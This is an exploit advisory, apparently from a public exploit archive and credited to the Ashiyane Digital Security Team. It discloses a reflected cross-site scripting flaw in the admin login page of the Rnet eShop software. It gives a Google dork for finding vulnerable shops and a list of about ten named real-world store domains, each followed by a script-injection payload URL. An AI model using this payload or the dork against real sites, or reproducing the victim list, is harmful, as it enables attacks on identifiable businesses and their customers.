Sites powered by Rnet eShop suffer from a cross site scripting vulnerability. Note that this finding houses site-specific data.
26f57a3452779788ae6639c5c91d689769f4f144df2809d9eca422b06b214af3
_ __ _____ _____
\ \ / / / ____| / ____|
\ V / | (___ | (___
> < \___ \ \___ \
/ . \ ____) | ____) |
/_/ \_\ |_____/ |_____/
#******************************************************************
# [+] Exploit Title : Rnet eShop Cross site scripting vulnerability
#
# [+] Software link : http://www.rnet.no
#
# [+] Exploit Author : Ashiyane Digital Security Team
#
# [+] Tested on: Windows 7 , Linux
#
# [+] Google Dork : intext:" Powered by Rnet eShop"
#
# [+] Date: 2013/09/01
#
--------------------------------------------------------------------
# [+] Exploit :
#
# [+] Location : [Target]/_admin_login.asp?e=&n=[xss]
#
#-------
# Proof:
#-------
#
# http://www.klamydia.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://www.glamourtopz.com/_admin_login.asp?e=&n=
"/><script>alert(1);</script>
#
# http://www.smart-alarm.no/_admin_login.asp?e=&n=
"/><script>alert(1);</script>
#
# http://www.testselv.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://www.urmaker-ronning.no/_admin_login.asp?e=&n=
"/><script>alert(1);</script>
#
# http://www.galleri-lindesnes.no/_admin_login.asp?e=&n=
"/><script>alert(1);</script>
#
# http://www.vareshop.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://tarmkreft.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://www.glamourtopz.com/_admin_login.asp?e=&n=
"/><script>alert(1);</script>
#
# http://www.perleshop.no/_admin_login.asp?e=&n=
"/><script>alert(1);</script>
#
#
######################
discovered by : ACC3SS
######################